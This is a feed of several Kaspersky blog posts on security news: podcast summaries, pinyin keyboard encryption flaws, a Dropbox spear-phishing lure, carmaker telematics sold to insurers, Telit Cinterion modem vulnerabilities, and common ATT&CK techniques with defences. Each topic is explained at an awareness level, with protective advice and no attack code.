Transatlantic Cable podcast episode 348 | Kaspersky official blog

/in

Episode 348 of the Transatlantic Cable podcast kicks off with news that Google plan to introduce a new AI tool to help detect if you’re being scammed in a phone call – a boon for those who fall prey to scams.  From there the team discuss news that Scarlett Johansson isn’t best pleased about the likeness of ChatGPT’s new voice, which sounds eerily familiar to her own.

To wrap up the team discuss two stories, firstly around how an ‘AI porn-maker’ (yes people, that’s now a job) accidentally leaked his own customer data. The second story centres around BT’s decision to move away from copper-cable landlines in the UK to an all-digital future – and it’s got several people annoyed.

If you liked what you heard, please consider subscribing.

Android is getting an AI-powered scam call detection feature
ChatGPT suspends Scarlett Johansson-like voice as actor speaks out against OpenAI
Nonconsensual AI Porn Maker Accidentally Leaks His Customers’ Emails
BT scraps digital landline switch deadline

Kaspersky official blog – ​Read More

Is it possible to spy on keystrokes from an Android on-screen keyboard? | Kaspersky official blog

/in

“Hackers can spy on every keystroke of Honor, OPPO, Samsung, Vivo, and Xiaomi smartphones over the internet” – alarming headlines like this have been circulating in the media over the past few weeks. Their origin was a rather serious study on vulnerabilities in keyboard traffic encryption. Attackers who are able to observe network traffic, for example, through an infected home router, can indeed intercept every keystroke and uncover all your passwords and secrets. But don’t rush to trade in your Android for an iPhone just yet – this only concerns Chinese language input using the pinyin system, and only if the “cloud prediction” feature is enabled. Nevertheless, we thought it would be worth investigating the situation with other languages and keyboards from other manufacturers.

Why many pinyin keyboards are vulnerable to eavesdropping

The pinyin writing system, also known as the Chinese phonetic alphabet, helps users write Chinese words using Latin letters and diacritics. It’s the official romanization system for the Chinese language, adopted by the UN among others. Drawing Chinese characters on a smartphone is rather inconvenient, so the pinyin input method is very popular, used by over a billion people, according to some estimates. Unlike many other languages, word prediction for Chinese, especially in pinyin, is difficult to implement directly on a smartphone – it’s a computationally complex task. Therefore, almost all keyboards (or more precisely, input methods – IMEs) use “cloud prediction”, meaning they instantaneously send the pinyin characters entered by the user to a server and receive word completion suggestions in return. Sometimes the “cloud” function can be turned off, but this reduces the speed and quality of the Chinese input.

To predict the text entered in pinyin, the keyboard sends data to the server

Of course, all the characters you type are accessible to the keyboard developers due to the “cloud prediction” system. But that’s not all! Character-by-character data exchange requires special encryption, which many developers fail to implement correctly. As a result, all keystrokes and corresponding predictions can be easily decrypted by outsiders.

You can find details about each of the errors found in the original source, but overall, of the nine keyboards analyzed, only the pinyin IME in Huawei smartphones had correctly implemented TLS encryption and resisted attacks. However, IMEs from Baidu, Honor, iFlytek, OPPO, Samsung, Tencent, Vivo, and Xiaomi were found to be vulnerable to varying degrees, with Honor’s standard pinyin keyboard (Baidu 3.1) and QQ pinyin failing to receive updates even after the researchers contacted the developers. Pinyin users are advised to update their IME to the latest version, and if no updates are available, to download a different pinyin IME.

Do other keyboards send keystrokes?

There is no direct technical need for this. For most languages, word and sentence endings can be predicted directly on the device, so popular keyboards don’t require character-by-character data transfer. Nevertheless, data about entered text may be sent to the server for personal dictionary synchronization between devices, for machine learning, or for other purposes not directly related to the primary function of the keyboard – such as advertising analytics.

Whether you want such data to be stored on Google and Microsoft servers is a matter of personal choice, but it’s unlikely that anyone would be interested in sharing it with outsiders. At least one such incident was publicized in 2016 – the SwiftKey keyboard was found to be predicting email addresses and other personal dictionary entries of other users. After the incident, Microsoft temporarily disabled the synchronization service, presumably to fix the errors. If you don’t want your personal dictionary stored on Microsoft’s servers, don’t create a SwiftKey account, and if you already have one, deactivate it and delete the data stored in the cloud by following these instructions.

There have been no other widely known cases of typed text being leaked. However, research has shown that popular keyboards actively monitor metadata as you type. For example, Google’s Gboard and Microsoft’s SwiftKey send data about every word entered: language, word length, the exact input time, and the app in which the word was entered. SwiftKey also sends statistics on how much effort was saved: how many words were typed in full, how many were automatically predicted, and how many were swiped. Considering that both keyboards send the user’s unique advertising ID to the “headquarters”, this creates ample opportunity for profiling – for example, it becomes possible to determine which users are corresponding with each other in any messenger.

If you create a SwiftKey account and don’t disable the “Help Microsoft improve” option, then according to the privacy policy, “small samples” of typed text may be sent to the server. How this works and the size of these “small samples” is unknown.

“Help Microsoft improve”… what? Collecting your data?

Google allows you to disable the “Share Usage Statistics” option in Gboard, which significantly reduces the amount of information transmitted: word lengths and apps where the keyboard was used are no longer included.

Disabling the “Share Usage Statistics” option in Gboard significantly reduces the amount of information collected

In terms of cryptography, data exchange in Gboard and SwiftKey did not raise any concerns among the researchers, as both apps rely on the standard TLS implementation in the operating system and are resistant to common cryptographic attacks. Therefore, traffic interception in these apps is unlikely.

In addition to Gboard and SwiftKey, the authors also analyzed the popular AnySoftKeyboard app. It fully lived up to its reputation as a keyboard for privacy diehards by not sending any telemetry to servers.

Is it possible for passwords and other confidential data to leak from a smartphone?

An app doesn’t have to be a keyboard to intercept sensitive data. For example, TikTok monitors all data copied to the clipboard, even though this function seems unnecessary for a social network. Malware on Android often activates accessibility features and administrator rights on smartphones to capture data from input fields and directly from files of “interesting” apps.

On the other hand, an Android keyboard can “leak” not only typed text. For example, the AI.Type keyboard caused a data leak for 31 million users. For some reason, it collected data such as phone numbers, exact geolocations, and even the contents of address books.

How to protect yourself from keyboard and input field spying

Whenever possible, use a keyboard that doesn’t send unnecessary data to the server. Before installing a new keyboard app, search the web for information about it – if there have been any scandals associated with it, it will show up immediately.
If you’re more concerned about the keyboard’s convenience than its privacy (we don’t judge, the keyboard is important), go through the settings and disable the synchronization and statistics transfer options wherever possible. These may be hidden under various names, including “Account”, “Cloud”, “Help us improve”, and even “Audio donations”.
Check which Android permissions the keyboard needs and revoke any that it doesn’t need. Access to contacts or the camera is definitely not necessary for a keyboard.
Only install apps from trusted sources, check the app’s reputation, and, again, don’t give it excessive permissions.
Use comprehensive protection for all your Android and iOS smartphones, such as Kaspersky Premium.

Kaspersky official blog – ​Read More

Updating our SIEM system to version 3.0.3 | Kaspersky official blog

/in

For many InfoSec teams, security information and event management (SIEM) is at the heart of what they do. A company’s security depends to a large extent on how well its SIEM system allows experts to focus directly on combating threats and avoid routine tasks. That’s why almost every update of our Kaspersky Unified Monitoring and Analysis Platform is aimed at improving the user interface, automating routine processes and adding features to make the work of security teams easier. Many of the improvements are based on feedback from our customers’ InfoSec experts. In particular, the latest version of the platform (3.0.3) introduces the following features and improvements.

Writing filter conditions and correlation rules as code

Previously, analysts had to set filters and write correlation rules by clicking the conditions they needed. In this update, the redesigned interface now allows advanced users to write rules and conditions as code. Builder mode remains: filter and selector conditions are automatically translated between builder and code modes.

Same rule condition in builder and code modes

What’s more, builder mode also lets you write conditions using the keyboard. As soon as you start entering a filter condition, Kaspersky Unified Monitoring and Analysis Platform will suggest suitable options from event fields, dictionaries, active sheets, etc. To narrow down the range of options, simply enter the appropriate prefix. For your convenience, condition types are highlighted in different colors.

Code mode lets you quickly edit correlation rule conditions, as well as select and copy conditions as code and easily transfer them between different rules or different selectors within a rule. The same code blocks can also be moved to filters (a separate system resource), which greatly simplifies their creation.

Extended event schema

Kaspersky Unified Monitoring and Analysis Platform retains Common Event Format (CEF) as the basis for the event schema, but we have added the ability to create custom fields, which means you can now implement any taxonomy. No more being limited to vendor-defined fields, you can name event fields anything you want to make it easier to write search queries. Custom fields are typed and must begin with a prefix that determines both its type and the array type. Fields with arrays can only be used in JSON and KV normalizers.

Example of normalization using CEF fields and custom fields

Automatic identification of event source

Kaspersky Unified Monitoring and Analysis Platform administrators no longer need to set up a separate collector for each event type or open ports for each collector on the firewall – in the new version we have implemented the ability to collect events of different formats with a single collector. The collector selects the correct normalizer based on the source IP address. Using a chain of normalizers is permitted. For example, the [OOTB] Syslog header normalizer accepts events from multiple servers and allows you to define a DeviceProcessName and direct bind events to the [OOTB] BIND Syslog normalizer and squid events to the [OOTB] Squid access Syslog normalizer.

Kaspersky Unified Monitoring and Analysis Platform: Event parsing

The following event normalization options are now available:

1 collector – 1 normalizer. We recommend using this method if you have many events of the same type or many IP addresses from which events of the same type may originate. In terms of SIEM performance, configuring a collector with only one normalizer would be optimal.

1 collector – multiple normalizers, based on IP addresses. This method is available for collectors with a UDP, TCP or HTTP connector. If a UDP, TCP or HTTP connector is specified in the collector at the Transport step, then at the Event Parsing step, on the Parsing settings tab, you can specify multiple IP addresses and select which normalizer to use for events arriving from those addresses. The following types of normalizers are available: JSON, CEF, regexp, Syslog, CSV, KV, XML. For Syslog or regexp normalizers, you can specify additional normalization conditions depending on the value of the DeviceProcessName field.

These are by no means the only updates to Kaspersky Unified Monitoring and Analysis Platform. There are also changes related to context tables, simplified binding of rules to correlators and other improvements. All of them are designed to improve the user experience for InfoSec professionals – see the full list here. To learn more about our SIEM system, Kaspersky Unified Monitoring and Analysis Platform, please visit the official product page.

Kaspersky official blog – ​Read More

Transatlantic Cable podcast episode 347 | Kaspersky official blog

/in

Episode 347 of the Transatlantic Cable podcast begins with news that Dell have been hit by a data breach, however details on the breach are scarce. Following that the team discuss another data breach, this time affecting Europol.

To wrap up the team discuss two stories, the first around Spanish police pulling data on suspects from sources such as Proton mail and Apple. The final story is around Securelist’s latest APT report, looking at Q1 2024.

If you liked what you heard, please consider subscribing.

Dell Discloses Data Breach As Hacker Sells 49 Million Customer Data
Europol Hacked? IntelBroker Claims Major Law Enforcement Breach
Encrypted services Apple, Proton and Wire helped Spanish police identify activist
APT trends report Q1 2024

Kaspersky official blog – ​Read More

Two-stage Dropbox spear phishing | Kaspersky official blog

/in

Phishers are increasingly using sophisticated targeted attacks. In addition to leveraging a variety of legitimate online services, they employ social engineering to trick the victim into following a link. We recently uncovered another in a series of unconventional multi-stage phishing schemes that merits at least a warning to employees who handle financial documents.

The first email

The attack begins with an email to the victim that appears to be from a real auditing firm. In it, the sender says that they tried to send an audited financial statement, but it was too large to email, so it had to be uploaded to Dropbox. Note that the email is sent from a real address on the company’s mail server (the attackers most likely hijacked the mailbox).

The first email from an “auditing firm” is intended to soften up the victim

From the perspective of any mail security system, this email is perfectly legitimate – indistinguishable from normal business correspondence. It contains no links, comes from a legitimate company address, and merely informs the recipient of a failed attempt to send an audit via email. This message is bound to get the attention of the accountant reading it. It contains a disclaimer that the content is confidential and intended solely for the recipient, and the company in whose name it was sent has a large online presence. All in all, it looks pretty convincing.

The only small red flag is the information that the report had to be resent using Dropbox Application Secured Upload. There is no such thing. A file uploaded to Dropbox can be password-protected, but nothing more. The real purpose of this phrase is presumably to prepare the recipient for the fact that some form of authentication will be required to download the report.

The second email

Next comes a notification directly from Dropbox itself. It states that the auditor from the previous email has shared a file called “audited financial statements” and asked that it be reviewed, signed, and returned for processing.

A perfectly normal Dropbox notification stating that a file has been shared with the recipient

There is nothing suspicious about this email either. It contains a link to a perfectly legitimate online data storage service (which is why they use Dropbox). If the notification had arrived without any accompanying message, it would most likely have been ignored. However, the recipient has been primed, so they are more likely to go to the Dropbox website and try to view the document.

Dropbox file

When the victim clicks the link, they see a blurred document and a window opens on top of it requesting authentication using office credentials. Here, however, seeing is not believing, for both the blurred background and the window with a button are in fact parts of a single image inserted into a PDF file.

PDF file uploaded to Dropbox that mimics an authentication request

The victim doesn’t even need to click the VIEW DOCUMENT button – the entire surface of the image is essentially one big button. The link underneath it leads (via an intermediate site with a redirect) to a script that launches a form to enter login credentials – just what the attackers want.

All company employees need to be aware that work passwords should only be entered on sites that clearly belong to their company. Neither Dropbox nor external auditors should know your work password and therefore cannot verify its authenticity.

How to stay safe

As attackers come up with ever more sophisticated schemes to steal corporate credentials, we recommend implementing solutions that provide information security on multiple levels. First, use corporate mail server protection, and second, install a security solution with reliable anti-phishing technologies on all internet-facing work devices.

Kaspersky official blog – ​Read More

How carmakers sell driver data to insurers | Kaspersky official blog

/in

Early in the movie “The Fifth Element”, there is a sequence that shows the dystopian nature of the future world: Korben Dallas’s smart taxi fines him for a traffic violation and revokes his license. Back in 1997, this seemed like science fiction – and it was. Today it’s turning into reality. But first things first.

Not so long ago, we looked at the potential dangers associated with the amount of data modern vehicles collect about their owners. Then, even more recently, an investigation revealed what this might mean in practice for drivers.

It turns out that carmakers, through specialized data brokers, are already selling telematics data to insurance companies, who are using it to raise the cost of insurance for careless drivers. Most alarming of all, however, is that car owners are often kept in the dark about all of this. Let’s investigate further.

Gamification of safe driving with far-reaching consequences

It all started in the US when owners of General Motors vehicles (parent company of the Chevrolet, Cadillac, GMC, and Buick brands) noticed a sharp rise in their auto insurance premiums compared to the previous period. The reason, it transpired, was the practice of risk profiling by data broker LexisNexis. LexisNexis works with auto insurers to supply them with driver information, usually about accidents and traffic fines. But vehicle owners hit by the premium hike had no history of accidents or dangerous driving!

The profiles compiled by LexisNexis were found to contain detailed data on all trips made in the insured vehicle, including start and end times, duration, distance and, crucially, all instances of hard acceleration and braking. And it was this data that insurers were using to increase insurance premiums for less-than-perfect drivers. Where did the data broker get such detailed information?

From General Motors’ OnStar Smart Driver. That is the name of the “safe driving gamification” feature built into General Motors vehicles and the myChevrolet, myCadillac, myGMC, and myBuick mobile apps. The feature tracks hard acceleration and braking, speeding, and other dangerous events, and rewards “good” driving with virtual awards.

The OnStar Smart Driver safe driving gamification feature is built into myChevrolet, myCadillac, myGMC, and myBuick mobile apps by General Motors. Source

What’s more, according to some car owners, they didn’t enable the feature themselves – the car dealer did it for them. Crucially, neither General Motors’ apps nor the terms of use explicitly warned users that OnStar Smart Driver data would be shared with insurance-related data brokers.

This lack of transparency extended to the privacy statement on the OnStar website. While the statement mentions the possibility of sharing collected data with third parties, insurers are not specifically listed, and the text generally aims for maximum vagueness.

Along the way, LexisNexis was discovered to be working with three other automakers besides General Motors – Kia, Mitsubishi, and Subaru – all of which have similar safe driving gamification programs under names like “Driving Score” or “Driver Feedback”.

According to the LexisNexis website, the companies that work with the data broker include General Motors, Kia, Mitsubishi, and Subaru. Source

At the same time, another data broker – Verisk – was found to be providing telematics data to car insurers. Its automotive clients include General Motors, Honda, Hyundai, and Ford.

Another broker, Verisk, lists General Motors, Honda, Hyundai, and Ford in its telematics sales service description. Source

As a result, many drivers found themselves, in effect, locked into a car insurance policy with costs based on driving habits. It’s just that such programs used to be voluntary, offering a basic discount for participation – and even then, most drivers opted out. Now it appears that carmakers are enrolling customers not only without their consent, but without their knowledge.

According to available information, this is currently only happening to drivers in the US. But what starts in the States usually migrates, so similar practices may soon appear in other regions.

How to protect yourself from data-hungry cars

Unfortunately, there is no silver bullet to stop your automobile from harvesting data. Most new vehicles already come with built-in telematics collection as standard. And the number is only going to grow so that in a year or two these cars will make up more than 90% of the market. Naturally, the maker of your car won’t make it easy or even possible to turn off telematics.

If you’re ready to consider the factor of your car collecting data on you for third parties (or, in simple words, spying), then read our post with detailed tips on how you can try to get rid of surveillance by carmakers. Spoiler alert: it’s not easy and requires careful study of the documentation, as well as sacrificing some of the benefits of connected cars, so these tips won’t work for everyone.

As for the scenario described in this post of selling driver data to insurers, our advice is to search the in-vehicle menu and mobile app for a safe driving gamification feature and disable it. It may be called “Smart Driver”, “Driving Score”, “Driver Feedback”, or something similar. US-based drivers are also advised to request their data from LexisNexis and Verisk to be prepared for nasty surprises, and to see if it’s possible to delete information that has already been collected.

Kaspersky official blog – ​Read More

Critical vulnerabilities in Telit Cinterion modems | Kaspersky official blog

/in

Several serious vulnerabilities have been discovered in Telit Cinterion cellular M2M modems, including the possibility of remote arbitrary code execution (RCE) via SMS messages. These modems are used in millions of different devices and systems for both the consumer market segment (payment terminals, ATMs, cars) and various industries such as healthcare, financial, telecommunications, manufacturing and so on. We’ll tell you about the detected vulnerabilities and how you can protect yourself from them.

Critical vulnerabilities in Cinterion modems

In total, Kaspersky ICS-CERT experts discovered seven zero-day vulnerabilities in Telit Cinterion modems:

CVE-2023-47610 / KLCERT-23-018: An attacker can achieve remote code execution (RCE) on the system by sending specially crafted SMS.
CVE-2023-47611 / KLCERT-22-216: Allows an attacker with low privileges on the system to elevate them to “manufacturer” level.
CVE-2023-47612 / KLCERT-22-194: An attacker with physical access to the device has the ability to read and write any files and directories on the system, including those that are hidden.
CVE-2023-47613 / KLCERT-22-211: Allows an attacker with low privileges on the system to escape a virtual directory and gain read and write access to protected files.
CVE-2023-47614 / KLCERT-22-210: Allows an attacker with low privileges on the system to disclose hidden virtual paths and filenames.
CVE-2023-47615 / KLCERT-22-212: Allows an attacker with low privileges on the system to gain unauthorized access to sensitive data.
CVE-2023-47616 / KLCERT-22-193: An attacker with physical access to the device has the ability to gain unauthorized access to sensitive data.

The most dangerous is the first vulnerability on this list (CVE-2023-47610). Among other things, it allows attackers to manipulate the modem’s memory and flash drive, ultimately giving them complete control over the system. Furthermore, this attack does not require physical access to the device or authentication.

Which devices have the described vulnerabilities?

All of the vulnerabilities mentioned above, from CVE-2023-47610 to CVE-2023-47616, affect the following list of cellular IoT modems:

Cinterion BGS5
Cinterion EHS5/6/8
Cinterion PDS5/6/8
Cinterion ELS61/81
Cinterion PLS62

Information about the vulnerabilities in these products was communicated in advance to Cinterion, the manufacturer of the modems.

It should be noted that the Cinterion modem line has changed hands several times. Cinterion company was acquired by Gemalto in 2010. In 2019, Gemalto was absorbed by Thales. Finally, in 2023, Thales sold the Cinterion modem line to Telit, resulting in Telit Cinterion.

It’s extremely difficult at this stage to compile a complete list of end products affected by these vulnerabilities. Manufacturers rarely disclose the component base used in their products, and cellular modem chips are often not directly integrated into end devices, but are parts of other components. What you end up with is multistage nesting – one supplier uses another supplier’s solutions in their product, that supplier uses a third, and so on down the chain. As a result, it is not easy even for the manufacturer of the end device to determine which chip performs the modem functions.

In the near future, our experts plan to publish a detailed technical report on the security of Telit Cinterion modems on the Kaspersky ICS-CERT website.

We are now communicating with the manufacturers of those products known to use vulnerable modems.

If you are aware of such products, please notify us at mailto:ics-cert@kaspersky.com. We will try to contact the manufacturers and provide them with a modem vulnerability report so that they can assess the impact of the vulnerabilities on the security of their products and plan mitigation measures.

How to protect yourself from the described vulnerabilities

To protect against the most dangerous of the discovered vulnerabilities (CVE-2023-47610), Kaspersky ICS-CERT experts recommend the following measures:

Disable SMS delivery to affected devices (this can be done by the telecom operator).
Use a private access point name (APN) with strict security settings.

For the other vulnerabilities (from CVE-2023-47611 to CVE-2023-47616), Kaspersky ICS-CERT experts advise doing the following:

Enforce application signature verification to prohibit installation of untrusted MIDlets on the device.
Strictly control physical access to the vulnerable devices.
Install updates and perform regular security audits.

Kaspersky official blog – ​Read More

Defending against popular cyberattack techniques in 2024

/in

Recent reports by Kaspersky experts on the statistics of Managed Detection and Response (MDR) and Incident Response (IR) services for 2023 reveal that most observed cyberattacks employ a handful of techniques that are repeated time and again. These techniques are seen both in attacks that are fully executed and cause damage, as well as in incidents that are stopped in their early stages. We decided to list these techniques based on the ATT&CK framework and summarize expert recommendations for neutralizing them. The frequency of use for each technique and specific examples can be found in the reports themselves.

Exploiting public-facing applications

ATT&CK Technique: T1190, Tactic: TA0001 (Initial Access)
What it is: Exploiting vulnerabilities in one of the organization’s applications that is accessible from the internet. Web servers, Exchange servers, database servers, and VPN access points are the most popular targets. Attackers also actively seek out and exploit publicly accessible IT infrastructure control panels – from SSH servers to SNMP.

How to protect yourself: Prioritize updating software at the network perimeter and use additional security measures for perimeter services. Close control ports to external access. Regularly scan the external perimeter for vulnerabilities and for applications that have accidentally been granted external access, and revoke it. Install EDR agents and security tools, including on application servers.

Phishing

ATT&CK Technique: T1566, Tactic: TA0001 (Initial Access)
What it is: Mass or targeted distribution of messages via email, SMS, and messaging apps designed to trick company employees into disclosing their credentials or downloading malicious content via a link.

How to protect yourself: Raise awareness among all company employees, conduct training sessions, use the latest security solutions for mail servers, and deploy EMM/UEM solutions to protect employees’ mobile devices, including personal ones.

Valid accounts compromised by attackers

ATT&CK Technique: T1078, Tactics: TA0001, TA0003, TA0004, TA0005 (Initial Access, Persistence, Privilege Escalation, Defense Evasion)

What it is: One of the most effective techniques employed by attackers. During initial network penetration, attackers use employee credentials obtained through purchased leaks or phishing. They then use domain and local accounts found on the compromised computer to develop the attack.

How to protect yourself: Implement phishing-resistant multi-factor authentication (MFA) methods, especially for privileged accounts. Adopt the principle of least privilege. Deactivate default accounts (such as “guest”), and for local administrator accounts, set a unique password for each computer. Use SIEM and XDR to detect anomalous user actions.

Brute force

ATT&CK Technique: T1110, Tactic: TA0006 (Credential Access)

What it is: Attackers can discover passwords for accounts of interest through brute-force attacks or password guessing based on known hashes. A variation of this attack is password spraying, where the same popular passwords are applied to a number of accounts in the hope of finding a user who chose such a weak password.

How to protect yourself: Implement password policies that prevent brute-force attacks and apply stricter policies to accounts where MFA cannot be enabled. Limit the number of login attempts across all systems and block the account if the number of attempts is exceeded. Configure SIEM monitoring rules to detect an overall increase in failed authentication attempts.

Trusted relationship

ATT&CK Technique: T1199, Tactic: TA0001 (Initial Access)

What it is: Compromising an organization through its partners and contractors. If a partner is hacked, attackers can use the discovered access points and tools to infiltrate the organization. In practice, hackers most often target IT subcontractors (MSPs, authentication providers, technical support specialists) with administrative access to the organization’s systems.

How to protect yourself: Regularly audit external access, revoke outdated permissions, apply the principle of least privilege to them, and implement strict password policies and MFA for such accounts. Use network segmentation to restrict external contractors to only the resources they need.

Command and scripting interpreter

ATT&CK Technique: T1059, Tactic: TA0002 (Execution)

What it is: In the vast majority of attacks, attackers need to execute their own code on compromised computers. To avoid attracting attention and using specialized malware, they often use legitimate scripting tools that are already installed on most corporate systems. The most popular of these is Microsoft PowerShell, but there are also attacks using scripts in Visual Basic, Python, and AutoIT, as well as basic Windows and Unix shells (cmd and sh/bash/zsh).

How to protect yourself: Use allowlisting to restrict the launch of applications not required on specific computers. Track the launch of script interpreters using XDR and EDR, but keep in mind that the detection logic must be continuously adjusted to the specifics of the organization’s IT infrastructure.

Account manipulation

ATT&CK Technique: T1098, Tactics: TA0003, TA0004 (Persistence, Privilege Escalation)

What it is: A wide range of changes that attackers make to accounts they have access to. These changes can include adding an account to privileged groups, enabling deactivated accounts, changing passwords, and modifying permissions for accounts and groups.

How to protect yourself: Apply the principle of least privilege, perform regular account inventories, revoke outdated permissions, and block or delete unnecessary accounts.

Exploitation of remote services

ATT&CK Technique: T1210, Tactic: TA0008 (Lateral Movement)

What it is: After compromising one of the computers on the network, attackers scan it for vulnerable applications in order to infect additional computers or gain elevated privileges on them. In 2023, old vulnerabilities in SMB v1 and Exchange Server were quite popular, confirming that IT services are not paying enough attention to fixing vulnerabilities.

How to protect yourself: Update client and server applications promptly, disable unnecessary services on all computers, and use network segmentation and the principle of least privilege to limit attackers’ capabilities even if they manage to exploit a vulnerability. Use security solutions that can detect and block attempts to exploit vulnerabilities.

Launching system services

ATT&CK Technique: T1569, Tactic: TA0002 (Execution)

What it is: In addition to using command shells, attackers often use the launch of system services to execute malicious tasks and establish persistence in the system. The undisputed leader here is PsExec, which can be used to execute a desired task on a remote Windows computer.

How to protect yourself: Use XDR or EDR systems that can track anomalous behavior of system services, configure policies to restrict low-privileged users from launching privileged services and installing system software.

Bonus track: LOLBins

In most stages of an attack, attackers try to use legitimate IT administration tools to blend in with normal network activity and avoid detection. Some cases have already been described above (PowerShell, PsExec), but in a significant number of attacks, attackers also use AnyDesk for management and control, Advanced IP Scanner and SoftPerfect Network Scanner for network scanning, and security testing tools: Mimikatz for privilege escalation, and Cobalt Strike and Metasploit for lateral movement within the network. You can read about protection against the use of LOLBins in this post.

Kaspersky official blog – ​Read More

Human body pose recognition using Wi-Fi signal | Kaspersky official blog

/in

To find a (honest) man, Diogenes famously used a lantern – the philosopher relied solely on optical recognition methods. Today, however, scientists suggest using Wi-Fi signals for this purpose. More specifically, the method developed by three researchers at Carnegie Mellon University uses the signal from an ordinary home Wi-Fi router to not only pinpoint a person’s location in a room, but also to identify their pose.

Why Wi-Fi? There are several reasons for this. Firstly, unlike optical recognition, radio signals work perfectly in the dark and aren’t hindered by small obstacles like furniture. Secondly, it’s cheap, which can’t be said for lidars and radars – other tools that could potentially do the job. Thirdly, Wi-Fi is already ubiquitous – just reach out and grab it. But just how effective is this method? And what can you do with it? Let’s dive in.

DensePose: a method for recognizing human poses in images

To get started, however, we need to back up a bit – first, we need to understand how to accurately recognize the human body and its poses in general. In 2018, another group of scientists presented a method called DensePose. They successfully used it to recognize human poses in photographs – that is, two-dimensional images with no additional data for depth.

Here’s how it works: first, the DensePose model searches for objects in the images that are recognized as human bodies. These objects are then segmented into distinct areas, each corresponding to a specific body part, and analyzed individually. This approach is used because body parts move very differently: for example, the head and torso behave very differently from the arms and legs.

DensePose can accurately recognize the poses of human bodies in photographs and even create UV maps of their surfaces. Source

As a result, the model has learned to correlate a 2D image with the 3D surface of the human body, obtaining not only image annotations corresponding to the recognized pose, but also a UV map of the body depicted in the photo. The latter makes it possible, for example, to overlay a texture on the image.

Most impressively, this technique can accurately recognize the poses of multiple people in group photos, even those chaotic “prom night” pictures where people are huddled together and partially obstruct each other.

DensePose accurately recognizes the positions of individual figures in group photos. Source

What’s more, if the images presented in the paper and the videos published by the researchers are to be believed, the system can confidently handle even the most unusual body positions. For example, the neural network correctly identifies people on bicycles, motorcycles, and horseback, and also accurately determines the poses of baseball players, soccer players, and even breakdancers, who often move in unpredictable ways.

The DensePose model works well even for highly unusual poses. Source

Another advantage of DensePose is that it doesn’t demand extraordinary computing power to work. Using a GeForce GTX 1080 – hardly a top-of-the-line graphics card, even at the time the study was published – DensePose captures 20-26 frames per second at a resolution of 240×320 and up to five frames per second at a resolution of 800×1100.

DensePose over Wi-Fi: radio waves instead of photos

Basically, the Carnegie Mellon researchers’ idea was to use the existing high-performance body recognition AI model, DensePose, but feed it Wi-Fi signals instead of photographs.

For their experiment, they constructed the following setup:

Two stands with standard TP-Link home routers, each equipped with three antennas: one served as a transmitter, the other as a receiver.
The recognition scene positioned between these stands.
A camera mounted on a stand next to the receiver router, capturing the same scene that the researchers were aiming to recognize using Wi-Fi signals.

General diagram of the test bench for recognizing human poses using Wi-Fi. Source

Next, they ran DensePose, which identified body positions using the camera installed next to the receiver router, and tasked it with training another neural network that worked with the Wi-Fi signal from the receiving router. This signal was preprocessed and modified for more reliable recognition – but these are minor details. The point is that the researchers were indeed able to create a new Wi-Fi-DensePose model that accurately reconstructs the spatial positions of human bodies using Wi-Fi signals.

In good conditions, the model can recognize human poses very well. Source

Limitations of the method

However, let’s not rush to write headlines like “Scientists Learn to See Through Walls Using Wi-Fi” just yet. First of all, the “seeing” here is quite abstract – the model doesn’t actually “see” the human body, but can predict its location and pose with a certain probability based on indirect data.

Visualizing anything with intricate detail using Wi-Fi signals is a complex challenge. This is demonstrated by another, similar study in which researchers experimented with objects much simpler than human bodies – and the results were, to put it mildly, far from ideal.

Visualizing objects using a Wi-Fi signal: the less pronounced the edges, the worse it turns out. Source

It’s also important to note that the model built by the Carnegie Mellon University researchers is significantly less accurate than the original method of recognizing poses in photographs, and also exhibits quite serious “hallucinations”. The model has particular difficulty with unusual poses or scenes involving more than two people.

The Wi-Fi-DensePose model does not do a good job of handling non-standard poses or large numbers of human bodies in a single scene. Source

In addition, the test conditions in the study were meticulously controlled: a simple, well-defined geometry, a clear line of sight between the transmitter and receiver, minimal radio signal interference – the researchers set up everything so they could easily “penetrate” the scene with radio waves. This ideal scenario is unlikely to be replicated in the real world.

So if you’re worried about someone hacking into your Wi-Fi router and monitoring what you do at home, relax. If there’s anything to be concerned about in your home, it’s household appliances. For example, smart pet feeders or even children’s toys have cameras, microphones, and cloud connectivity, while robot vacuum cleaners even have lidars that work flawlessly in the dark, as well as the ability to move around.

And just outside, another spy is waiting for you – a four-wheeled one. In terms of the amount of information they collect, today’s cars are miles ahead of smartwatches, smart speakers, and other everyday gadgets.

Kaspersky official blog – ​Read More

Transatlantic Cable podcast episode 346 | Kaspersky official blog

/in

For the 346th episode of the Kaspersky Transatlantic Cable Podcast, Jag and I dive into a handful of stories that tie back to disinformation, privacy, people persisting, before ending with the WTF story of the week (and perhaps year).

We kick things off discussing WhatsApp and encryption, but more importantly how the app’s boss understands that it is being used – even in countries where there are bans on the popular messenger app. From there, we jump into the story from last week that impacts users of DropBox. After covering what it is, we discuss some safety measures that can be used by people using the service.

For our third story, we dive into the world of TikTok. While the US ban may be top of mind, we are actually crossing the world to discuss a recent phenomenon on the app that ties back to North Korea. It isn’t a hack, but rather an odd case of a propaganda song from the country going viral on the popular platform. Who would have thought that disinformation could go viral? But hey, I guess the beat slaps (as the kids say).

After that bit of head scratching, we head back to the US where recent research has shown that phishing sites impersonating the USPS are getting almost as much traffic as the real site. To close things out, we dive into AI and porn. More specifically, a new app being advertised on PornHub that allows anyone with the app to see any person neked, with the help of AI and without consent.

If you liked what you heard, please consider subscribing.

Tens of millions secretly use WhatsApp despite bans
Dropbox says hackers stole customer data, auth secrets from eSignature service
Why North Korea’s latest propaganda bop is a huge TikTok hit
US Post Office phishing sites get as much traffic as the real one
Pornhub’s Nonconsensual ‘Nudify’ Ad

Kaspersky official blog – ​Read More